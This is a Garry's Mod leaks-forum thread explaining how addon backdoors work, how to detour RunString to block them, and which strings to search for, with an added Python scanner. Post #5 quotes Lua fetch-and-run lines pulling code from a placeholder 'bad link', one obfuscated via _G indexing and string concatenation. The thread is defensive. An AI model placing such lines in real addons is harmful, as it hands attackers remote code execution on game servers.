Garry's Mod Leaks

[Info] What are backdoors, how do they work, how do you find them, how to stop them

Submitted by Poggers kekw, Thread ID: 260436

20-02-2023, 07:06 PM
#1
What Are Backdoors?

Backdoors are snippets of code that give an attacker full server-side access to your server.

Why should I care?

Having full server-side access can be very harmful, because with server-side access attackers can: ruin your economy, get everyone's IPs, get all of your addons, put ads outside of clients' screens making the attacker money (this has happened before), hold you, your server, or your files for ransom, and run visuals on your server.

How do they work?

There are many types of backdoors; here are some: web panels, web hooks, net strings, and concommands. I'll start with web panels. Web panels use an HTTP request to request a page and run code from that page; the thing that makes web panels web panels is that they can control your server from the website. Web hooks are just like web panels, but they inform the attacker of your server name, server password (if there is one) and net string. They can't control your server from the web hook (most of the time), but they still have server-side access. Net strings are just nets that can run code on the server or run console commands. This requires the attacker to be on the server to run it, and they don't get notified if your server runs the backdoor. Concommands are malicious console commands that can give superadmin, unban accounts, give money or ban people. This is usually a very beginner tactic.

What does a backdoor look like?

There are 2 types of backdoors: function and global (this is not actually correct, but it's how I sort them). Function-based backdoors are the simplest: they use some code-executing functions to run and execute code, for example RunString, RunStringEx (same thing as RunString), and CompileString. Global-based backdoors are a lot harder to find; they use global variables to call all the functions in a table form, then call code-executing functions from that table. For example: _G calls the global table, and to call RunString from _G you do _G["RunString"]. The thing that makes global-based backdoors hard to find is that you call the code-executing functions as a string from global, so you can encrypt the string and make it unsearchable. Some global variables are: _G, debug.getfenv(), debug.getregistry().


How do i stop them?

Most backdoor blockers use a tactic called "detouring." Detouring is when you preserve a vanilla Lua function and overwrite that function, letting you change it and add code to it while calling the preserved function inside of the overwritten one. Example:
Code:
local preserved_runstring = RunString -- keep a reference to the vanilla function
function RunString(code, identifier, error_handler)
     print(code) -- log every chunk of code passed to RunString
     return preserved_runstring(code, identifier, error_handler) -- then run it as normal
end
This code debugs RunString and prints any code executed with it. Blockers will search the "code" parameter and check if anything malicious is trying to get through, and will not execute the preserved RunString if it is malicious.

How do i find them?

Use a program like Sublime Text or Visual Studio, drag the leak folder onto the program, right click it and click 'search folder'. There you can search strings to find any function- or global-based backdoor. Here are some strings you can search: RunString, CompileString, http., _G, getfenv, getregistry.




Thanks for taking your time to read this informative narrative. Please like or +rep me if you found this useful.

Lost Programmer
My messages are open, ask me anything!
My Github

RE: [Info] What are backdoors, how do they work, how do you find them, how to stop them

#2
Damn, thanks for the information in your post, that helps very much, thanks!!!!

#3
Wow!!!!!!!!!!!!!!!!!!! Never seen something as detailed as this anywhere regarding Backdoors. @Forum Staff pin this on the forum!


#4
Is the http. format always a backdoor?


OP
This post was last modified: 05-03-2023, 05:24 PM by Poggers kekw
#5
05-03-2023, 04:41 PM
Celaz Wrote:
Is the http. format always a backdoor?
Not always, sometimes it can be an updater or DRM, but there's a really high chance it's a backdoor.
Most http backdoors will look like:
Code:
http.Fetch("bad link",function(b) RunString(b,":",false) end)

or

http.Fetch("bad link",RunString)

or

_G["ht".."tp"]["Fe".."tch"]("encry".."pted b".."ad li".."nk",function(b) _G["Run".."String"](b) end)
Updaters should look like:
Code:
local file_version = "1"
http.Fetch("update url", function(current_version)
      -- compare the version string returned by the server with the local one
      if current_version != file_version then
             print("outdated")
      end
end)
DRMs will look like:
Code:
http.Post("drm url", { key = "licensekey", owner = "7642867276230", addon = "hi ertrw" }, function(content)
      -- the DRM server answers "leaked" when the key has been revoked
      if content == "leaked" then
             print("blocked")
      else
             load(files) -- files: the protected addon code (placeholder in this sketch)
      end
end)

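An added example, not code from the thread or from any GMod project: a small Python scanner that does the 'search folder' step from post #1 over a leak folder, using the search strings listed there, and that first undoes the two obfuscations shown in post #5 (`"Run".."String"` concatenation and `_G["..."]` indexing) so they cannot hide from a plain text search. The SAMPLE string is constructed for the demo; the regexes assume plain double-quoted Lua literals without escapes.

```python
import re
from pathlib import Path

# Search strings listed in post #1 (plus the globals it names).
INDICATORS = ["RunString", "CompileString", "http.", "_G", "getfenv", "getregistry"]

# Two or more string literals joined with "..", e.g. "Run".."String".
# Assumption: plain double-quoted literals, no escape sequences.
_CONCAT = re.compile(r'"[^"\\]*"(?:\s*\.\.\s*"[^"\\]*")+')
# A table index with a literal key, e.g. _G["RunString"].
_INDEX = re.compile(r'\["([A-Za-z_]\w*)"\]')

def normalise(line: str) -> str:
    """Undo both obfuscations so the plain search strings match again."""
    def join(m):
        parts = re.findall(r'"([^"\\]*)"', m.group(0))
        return '"' + "".join(parts) + '"'      # "Run".."String" -> "RunString"
    line = _CONCAT.sub(join, line)
    return _INDEX.sub(r".\1", line)            # _G["RunString"] -> _G.RunString

def scan_source(source: str):
    """Return (line_no, indicators_found, original_line) for every flagged line."""
    hits = []
    for no, raw in enumerate(source.splitlines(), 1):
        norm = normalise(raw)
        found = [ind for ind in INDICATORS if ind in norm]
        if found:
            hits.append((no, found, raw.strip()))
    return hits

def scan_folder(root):
    """Walk a leak folder and scan every .lua file, like 'search folder' in an editor."""
    results = {}
    for path in Path(root).rglob("*.lua"):
        hits = scan_source(path.read_text(errors="replace"))
        if hits:
            results[str(path)] = hits
    return results

# Constructed sample: the obfuscated http backdoor shape quoted in post #5.
SAMPLE = '''local x = 1
_G["ht".."tp"]["Fe".."tch"]("encry".."pted b".."ad li".."nk",function(b) _G["Run".."String"](b) end)
print("hello")
'''

if __name__ == "__main__":
    for no, found, text in scan_source(SAMPLE):
        print(f"line {no}: {', '.join(found)} -> {text}")
```

A hit on `http.` alone is a lead to read, not a verdict: as the OP says above, updaters and DRM use it too.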


This post was last modified: 05-03-2023, 05:56 PM by ertrw
#6
05-03-2023, 05:21 PM
Poggers kekw Wrote:
Code:
http.Post("drm url", { key = "licensekey", owner = "7642867276230", addon = "hi ertrw" }, function(content)
      if content == "leaked" then
             print("blocked")
      else
             load(files)
      end
end)

Yay, my name is in there hehe boiii, I've got it ^^ btw hi Poggers kekw :D

#7
The easiest would just be if no backdoor-infected files were posted, but yeah, it's most of the time pretty easy to remove.


OP
#8
05-03-2023, 06:38 PM
legonleon Wrote:
The easiest would just be if no backdoor-infected files were posted, but yeah, it's most of the time pretty easy to remove.
This would be difficult for Nulled. Nulled would have to do one of these options: scrape the URL and download the zip to check for backdoors, or have their own upload system. Scraping the URL would be a long, hard task for Nulled, and it breaks the scraped website's TOS. Their own upload system would break tons of copyright laws and would probably result in the website being seized or a massive lawsuit.



#9
One thing that helps is to see the date that the files were edited, so if you find a file that was edited on a different date than the others, it probably has a backdoor.


OP
#10
07-03-2023, 01:11 AM
henrique1000 Wrote:
One thing that helps is to see the date that the files were edited, so if you find a file that was edited on a different date than the others, it probably has a backdoor.
Depending on the addon size this would not be worth the time. As well, the actual time gets saved when zipping a file, so if the author reposts the zip directly from gms it will show different times even if it wasn't edited.
